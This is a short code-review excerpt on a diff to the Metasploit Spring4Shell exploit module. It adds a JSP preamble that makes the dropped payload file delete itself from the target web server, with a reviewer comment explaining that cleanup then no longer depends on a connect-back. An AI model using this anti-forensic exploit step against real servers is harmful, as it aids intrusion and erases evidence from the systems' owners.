modules/exploits/multi/http/spring_framework_rce_spring4shell.rb

```diff
@@ -172,27 +166,33 @@ def fix(jsp)
   end
 
   def create_jsp
+    jsp = <<~EOS
+      <%
+        File jsp=new File(getServletContext().getRealPath(File.separator) + File.separator + "#{@jsp_file}");
+        jsp.delete();
+      %>
```

Comment:
This preamble causes the JSP file to delete itself. This makes it unnecessary for the payload to successfully connect back to Metasploit in order to be cleaned up and fixes not knowing the absolute file path.